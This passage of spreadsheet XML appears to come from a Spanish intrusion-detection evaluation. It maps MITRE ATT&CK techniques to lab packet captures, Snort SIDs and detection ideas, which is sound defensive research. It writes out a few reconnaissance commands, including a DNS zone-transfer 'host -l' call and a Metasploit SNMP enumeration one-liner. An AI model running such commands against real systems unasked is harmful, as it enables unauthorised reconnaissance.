    <t>50447, 1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 41742, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 42289, 59258, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025, 2002752, 2002749, 2010706, 2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2009885, 2027250, 2101288, 2100937, 2101662, 2101489, 2101145, 2018413, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 2009749, 2101620</t>
  </si>
  <si>
    <t>50447, 1434, 1433, 1201, 1129, 1071, 2062, 43285, 1288, 41742, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 42289, 59258, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 1025, 2010706, 2049402, 2027261, 2022520, 2101201, 2101129, 2101071, 2009885, 2027250, 2101288, 2100937, 2101662, 2101489, 2101145, 2018413, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 2009749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Ataque</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Cada URL escaneada es considerada como una instancia de ataque.</t>
    </r>
  </si>
  <si>
    <t>9999, 40129, 56610, 59420</t>
  </si>
  <si>
    <t>40129, 56610, 59420</t>
  </si>
  <si>
    <t>9999, 40129, 59420</t>
  </si>
  <si>
    <t>GoBuster</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning2_[3].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Ejecucion de comando GoBuster para escaneo de la estructura de directorios </t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.4 y Manual [5] / C.39</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.5</t>
  </si>
  <si>
    <t>1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887</t>
  </si>
  <si>
    <t>2101129, 2101071, 2027261, 2022520, 2101201, 2027250, 2101145, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 2049402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2101129, 2101071, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027261</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101201, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027250, 2101145</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 2049402</t>
    </r>
  </si>
  <si>
    <t>2101129, 2101071, 2027261, 2022520, 2101201, 2027250, 2101145, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 50447, 41742, 33608, 42289, 59258,  2049402</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101129, 2101071, 2027261, 2022520, 2101201, 2009885, 2027250, 2101288, 2100937, 2101662, 2101489, 2101145, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 50447, 41742, 33608, 42289, 59258, 2049402</t>
  </si>
  <si>
    <t>2101129, 2101071, 2027261, 2022520, 2101201, 2009885, 2027250, 2101288, 2100937, 2101662, 2101489, 2101145, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 50447, 41742, 33608, 42289, 59258, 2049402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Ataque</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: Cada URL escaneada es considerada como una instancia de ataque.                           </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Análisis Manual:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> este ataque, debido al gran número de alertas generadas y al tamaño del fichero no ha podido analizarse manualmente. Los resultados automáticos contarán pero no se contabilizarán los SIDs para las tablas de análisis</t>
    </r>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>Transferencia de zona DNS</t>
  </si>
  <si>
    <t>T1596.001-DNS_Transfer_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte paquetes TCP dirigidos al puerto 53 que tengan los bytes "Question" igual a 1 y el resto a cero. Además, el campo "Type" debe tomar el valor "00 FC"</t>
  </si>
  <si>
    <t>Ejecución de comando para obtener informacion de la víctima (host -l javier.example.com IP)</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.1.2</t>
  </si>
  <si>
    <t>Manual [5] / C.40</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.2</t>
  </si>
  <si>
    <t>El uso de DNS para realizar una transferencia de zona siempre es un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100255, 255</t>
  </si>
  <si>
    <t>2100255, 255</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos con Ataque Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la alerta con SID 255 no se asocia a ningún flujo y paquete, por lo que para los análisis automáticos no se contabiliza como flujo y mensaje detectado. Sin embargo, en el análisis manual es posible asociar esta alerta al flujo y paquete correspondiente.</t>
    </r>
  </si>
  <si>
    <t>33337, 35287</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Recogida de información de la víctima mediante ingeniería social</t>
  </si>
  <si>
    <t>SEToolKit</t>
  </si>
  <si>
    <t>T1598.003-Spearphishing_Link_[5].pcapng</t>
  </si>
  <si>
    <t>Detección de macros o plantillas comúnmente usadas para llevar a cabo ataques de Phishing</t>
  </si>
  <si>
    <t>Manual [5] / 4.1.1</t>
  </si>
  <si>
    <t>Manual [5] / C.19</t>
  </si>
  <si>
    <t>Manual [5] / 5.1.3</t>
  </si>
  <si>
    <t>El phishing, en general, puede confundirse con actividad legítima (eso es lo que hace que el ataque tenga éxito). En ese sentido, aunque siempre será un ataque, dependiendo del contexto podrá no distinguirse de una actividad legítima</t>
  </si>
  <si>
    <t>24253, 2043343, 2044076, 2012886</t>
  </si>
  <si>
    <t>24253, 2043343, 2044076</t>
  </si>
  <si>
    <t>2043343, 2044076, 2012886, 15935, 59597, 50447, 24253</t>
  </si>
  <si>
    <t>2043343, 2044076, 15935, 59597, 24253</t>
  </si>
  <si>
    <t>50447, 2012886</t>
  </si>
  <si>
    <t>2043343, 2044076, 2012886, 15935, 59597, 50447, 24253, 2002752, 2002749, 2001117, 2101620, 2025364</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117, 2101620</t>
  </si>
  <si>
    <t>2043343, 2044076, 2012886, 15935, 59597, 50447, 24253, 2025364</t>
  </si>
  <si>
    <t>2043343, 2044076, 2012886, 15935, 59597, 50447, 24253, 2002752, 2002749, 2001117, 210162</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza 1 flujo ICMPv6, lo que causa que en vez de 59 flujos detectados sean 58. Este flujo no es relevante para el ataque, por lo que no influye en los resultados</t>
    </r>
  </si>
  <si>
    <t>9999, 56610</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>NAT Traversal</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Modificación de políticas de red para permitir tráfico externo a la red  interna</t>
  </si>
  <si>
    <t>iptables</t>
  </si>
  <si>
    <t>T1599-NBB1_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalías</t>
  </si>
  <si>
    <t>Equipo intermedio entre red interna de la víctima y el atacante con firewall. El atacante con acceso a este equipo intermedio modifica las reglas del firewall iptables para permitir su tráfico.</t>
  </si>
  <si>
    <t>Manual [5] / 4.4.2</t>
  </si>
  <si>
    <t>Manual [5] / C.20</t>
  </si>
  <si>
    <t>Manual [5] /  5.6.6</t>
  </si>
  <si>
    <t>La modificacion de politicas de red puede ser realizada por un atacante o por un administrador de red</t>
  </si>
  <si>
    <t>2002752, 2002749,1325</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el establecimiento de dos conexiones SSH, correspondientes a la segunda parte del ataque, despues de cambiar las políticas del firewall. </t>
    </r>
  </si>
  <si>
    <t>Network Address Translation Transversal</t>
  </si>
  <si>
    <t>T1599-NBB2_[5].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el establecimiento de dos conexiones SSH, correspondientes a la segunda parte del ataque, despues de cambiar las políticas del firewall. </t>
    </r>
  </si>
  <si>
    <t>Salto de VLAN</t>
  </si>
  <si>
    <t>T1599-Salto_vlan_[1].pcapng</t>
  </si>
  <si>
    <t>SNMP</t>
  </si>
  <si>
    <t>Detección por anomalías y estudio de topología de red, que detecte posibles vulnerabilidades relacionadas con el etiquetado apilable 802.1Q</t>
  </si>
  <si>
    <t>Manual [1] /  3.2.1</t>
  </si>
  <si>
    <t>Manual [1] / E.4</t>
  </si>
  <si>
    <t>El salto vlan siempre es un ataque</t>
  </si>
  <si>
    <t>2101620, 2002752, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la diferencia en los flujos detectados se debe a la identificación de flujos ARP por parte de tranalyzer y a flujos ICMPv6 no identificados por Snortv2 (no es relevante para el ataque)</t>
    </r>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Recogida MIB de un equipamiento</t>
  </si>
  <si>
    <t>T1602.001-MIB_Dump_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso del protocolo SNMP sobre UDP para acceder a la comunidad public, con fin de realizar un volcado total de las tablas</t>
  </si>
  <si>
    <t>Este ataque obtiene informacion de la MIB de un equipo mediante peticiones SNMP. Comando: msfconsole -x "use auxiliary/scanner/snmp/snmp_enum; set RHOSTS 192.168.2.2; run; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.8.1</t>
  </si>
  <si>
    <t>Manual [5] / C.41</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.10</t>
  </si>
  <si>
    <t>La recogida de MIBs haciendo uso de SNMP no siempre es un ataque, puede tratarse de una acción legítima</t>
  </si>
  <si>
    <t>1411, 1417</t>
  </si>
  <si>
    <t>2101411, 1411, 1417</t>
  </si>
  <si>
    <t>2101411, 2101417, 2002752, 2002749, 1411, 1417</t>
  </si>
  <si>
    <t>2002752, 2101417, 2101411, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101411, 2101417</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1411, 1417</t>
    </r>
  </si>
  <si>
    <t>34789, 34795</t>
  </si>
  <si>
    <t>snmpv1 -- infrastructure</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Creacion y montado de un contenedor con un servidor SSH sobre un equipo previamente vulnerado</t>
  </si>
  <si>
    <t>DockerAPI, SSH</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostLocal_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte descargas de contenedores mediante Docker API</t>
  </si>
  <si>
    <t>Construir contenedor sobre el equipo víctima para evitar ser detectados.</t>
  </si>
  <si>
    <t>Manual [5] / 4.4.3</t>
  </si>
  <si>
    <t>Manual [5] / C.21</t>
  </si>
  <si>
    <t>Manual [5] /  5.6.7</t>
  </si>
  <si>
    <t>Construir un contenedor en un equipo puede ser realizado por un administrador de red para alguna labor o por un atacante</t>
  </si>
  <si>
    <t>2044770, 2019240</t>
  </si>
  <si>
    <t>2044770, 2019240, 15259, 50447</t>
  </si>
  <si>
    <t>15259, 50447, 2002749, 2044770, 2002822, 2019240</t>
  </si>
  <si>
    <t>15259, 50447, 2044770, 2002822, 2019240</t>
  </si>
  <si>
    <t>86533, 32295, 599805, 656385684, 31914, 52175</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el establecimiento de dos conexiones SSH y transferencia de archivos maliciosos. Sin embargo, no detecta la construccion de una imágen en el Host</t>
    </r>
  </si>
  <si>
    <t>T1612-BuildImageOnHostNAT_[5].pcapng</t>
  </si>
  <si>
    <t>254, 2013504</t>
  </si>
  <si>
    <t>2001117, 2022218, 2101620, 2002749, 2002752, 2013504, 254</t>
  </si>
  <si>
    <t>2001117, 2101620, 2002749, 2002752</t>
  </si>
  <si>
    <t>2022218, 2013504, 254</t>
  </si>
  <si>
    <t>2001117, 2003195, 2002749, 2002752,</t>
  </si>
  <si>
    <t>apt-get -- managament -- consume big bandwith</t>
  </si>
  <si>
    <t>56101, 54319, 32880, 14984, 9999</t>
  </si>
  <si>
    <t>56101, 54319, 32880, 14984</t>
  </si>
  <si>
    <t>El SID 9999 detecta las URLs correspondientes a la descarga de la imágen mediante docker pero como no lo indica mediante una alerta específica de manera clara, no contará para el análisis de detección. Si tenemos en cuentas las alertas generadas mediante IPS y en Control de Aplicaciones se observa el uso de apt-get consumiendo gran ancho de banda, podemos considerar que el ataque está siendo detectado y se está produciendo una descarga desde docker</t>
  </si>
  <si>
    <t>4</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
  </si>
  <si>
    <t>T1615-Group_Policy_Discovery_[5].pcapng</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
  </si>
  <si>
    <t>Manual [5] /  4.6.1</t>
  </si>
  <si>
    <t>Manual [5] / C.22</t>
  </si>
  <si>
    <t>Manual [5] /  5.8.3</t>
  </si>
  <si>
    <t>El descubrimiento de politicas de grupo puede ser realizado por un administrador de red o por un atacante</t>
  </si>
  <si>
    <t>2002749, 2002752, 2101620</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no identifica dos flujos ICMP (no es relevante para el ataque)</t>
    </r>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Inyección</t>
  </si>
  <si>
    <t>T1659_Inyeccion_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, paquetes sospechosos de haber sido generados aleatoriamente y sin correlación con las comunicaciones establecidas. </t>
  </si>
  <si>
    <t>Manual [1] /  2.5.1.1.4</t>
  </si>
  <si>
    <t>Manual [1] / E.23</t>
  </si>
  <si>
    <t>Manual [5] /  5.3.6</t>
  </si>
  <si>
    <t>Esta técnica siempre se considera como un ataque</t>
  </si>
  <si>
    <t>399, 2100399, 2002752, 2002749</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100399</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP, pero no afecta a los resultados</t>
    </r>
  </si>
  <si>
    <t>Realizar una suplantación de identidad DHCP, saturando el servidor DHCP verdadero para que el servidor DHCP del atacante procese las consultas de un usuario. Posteriormente se manipula alguna consulta inyectando contenido malicioso</t>
  </si>
  <si>
    <t>dhcpstarv, Metasploit</t>
  </si>
  <si>
    <t>T1659-Content_Injection_[5].pcapng</t>
  </si>
  <si>
    <t>La detección de esta técnica será más o menos viable dependiendo del objetivo y método del atacante. Si el ataque se realiza en conjunto con protocolos de gestion(DHCP) dificultará la detección. Resultará necesario monitorizar por la distribución a traves del tráfico de red de archivos malware</t>
  </si>
  <si>
    <t>Suplantacion de identidad de DHCP Server para posteriormente inyectar contenido en la víctima con malware</t>
  </si>
  <si>
    <t>Manual [5] /  4.2.3</t>
  </si>
  <si>
    <t>Manual [5] / C.23</t>
  </si>
  <si>
    <t>La inyeccion de contenido en otro equipo siempre se considera como un ataque</t>
  </si>
  <si>
    <t>1917, 2018959, 2035480, 2025644</t>
  </si>
  <si>
    <t>2018959, 2035480, 2025644</t>
  </si>
  <si>
    <t>2018959, 2035480, 2025644, 24303, 1917, 15935</t>
  </si>
  <si>
    <t>24303, 1917, 15935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2018959, 2035480, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF57BB8A"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">1917, 15935, 2100527, 2002749, 2101620, 2002752, 2001117, 2101917, 2003595, 2018959, 2101200, 2035480, 2000419, 2025644
</t>
  </si>
  <si>
    <t>2002749, 2002752, 2101620, 2001117, 2101917, 2100527</t>
  </si>
  <si>
    <t>1917, 15935, 2003595, 2018959, 2101200, 2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t xml:space="preserve">1917, 15935, 2100527, 2002749, 2101620, 2002752, 2001117, 2101917, 2101200
</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 2101620, 2101917</t>
  </si>
  <si>
    <t>2018959, 2035480, 2025644, 2003595</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza 4 flujos ICMPv6 ni uno IGMP. No afectan al resultado final, pues no se tratan de flujos con ataque.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">9999, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="7"/>
        <sz val="14.0"/>
      </rPr>
      <t>54752, 39909, 33515</t>
    </r>
  </si>
  <si>
    <t>54752, 39909, 33515</t>
  </si>
  <si>
    <t>14984, 9999</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un Proxy</t>
  </si>
  <si>
    <t>Metasploit, HTTP Server</t>
  </si>
  <si>
    <t>T1665-Hide_Infrastructure_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por reglas/anomalías. Resulta importante monitorizar tráfico de red con destino a dominios incluidos en listas negras, conexiones a equpos externos...</t>
  </si>
  <si>
    <t>Esconder el servidor C2 utilizando un proxy</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.5</t>
  </si>
  <si>
    <t>Manual [5] / C.24</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.11</t>
  </si>
  <si>
    <t>Esconder un servidor C2 siempre es un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101917, 1917, 50447</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el uso de comandos de forma remota. Sin embargo, este es el medio previo para poder llevar a cabo el ataque principal, el cual no es detectado</t>
    </r>
  </si>
  <si>
    <t>LEYENDA DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>LEYENDA SIDs (TP prinicpales y TP colaterales)</t>
  </si>
  <si>
    <t>LEYENDA ATAQUES COLATERALES</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive Colateral </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF6AA84F"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <t>SI [1]</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas</t>
  </si>
  <si>
    <t>No, salvo circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas y circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>Si es detectable mediante patrones, pero se añade un matiz que afecta a la detección</t>
  </si>
  <si>
    <t>Para diferenciar aquellos TP que identifican instancias/mensajes/flujos de ataque principal frente a aquellos que identifican instancias/mensajes/flujos de ataques colaterales, éstos últimos se colorearán en verde. Aunque estos SIDs contarán como TP, no se incluirán en los contajes definitivos, pues no capturan el ataque implementado</t>
  </si>
  <si>
    <t>En determinadas técnicas, debido a la necesidad de que los flujos se encuentren completos para el análisis con otros cortafuegos como FortiGate o PaloAlto, el establecimiento de conexión no puede omitirse, lo que causa que Snort genere alertas para fases que no constituyen el ataque como tal</t>
  </si>
  <si>
    <t>Fichero pcap</t>
  </si>
  <si>
    <t>Tipo de tráfico</t>
  </si>
  <si>
    <t>Categoría</t>
  </si>
  <si>
    <t>Tamaño real del tráfico</t>
  </si>
  <si>
    <t>Nº de Flujos</t>
  </si>
  <si>
    <t>Nº de Direcciones Distintas</t>
  </si>
  <si>
    <t>SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>#SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>Contiene Flujos Truncados (Sin SYN)</t>
  </si>
  <si>
    <t>smtp-FIX.pcapng</t>
  </si>
  <si>
    <t>REAL</t>
  </si>
  <si>
    <t>Básico</t>
  </si>
  <si>
    <t>1,9 kB</t>
  </si>
  <si>
    <t>2002749</t>
  </si>
  <si>
    <t>http-FIX.pcapng</t>
  </si>
  <si>
    <t>52,7 kB</t>
  </si>
  <si>
    <t>youtube-FIX.pcapng</t>
  </si>
  <si>
    <t>332,7 kB</t>
  </si>
  <si>
    <t>2002749, 2002752, 2101620, 51037</t>
  </si>
  <si>
    <t>01 - DIT (01 - DIT (captura_00001_20240125083640)).pcapng</t>
  </si>
  <si>
    <t>TD</t>
  </si>
  <si>
    <t>100 MB</t>
  </si>
  <si>
    <t>2001219, 2002910, 2002911, 2003068, 2008120, 2010935, 2010937, 2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2001219, 2002749, 2002752, 2002910, 2002911, 2003068, 2008120, 2009207, 2010935, 2010937, 2019102, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2100615, 2100650, 2101384, 2101390, 2101411, 2101417, 2101444, 2101917</t>
  </si>
  <si>
    <t>02 - DIT (02 - DIT (captura_00001_20240202080842)).pcapng</t>
  </si>
  <si>
    <t>3,9 MB</t>
  </si>
  <si>
    <t>2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2100381, 2100384, 2100399, 2100402, 2100408, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>03 - DIT (03 - DIT (captura_00002_20240125191218)).pcapng</t>
  </si>
  <si>
    <t>103 MB</t>
  </si>
  <si>
    <t>2019102, 2100366, 2100476, 2101384, 2101411</t>
  </si>
  <si>
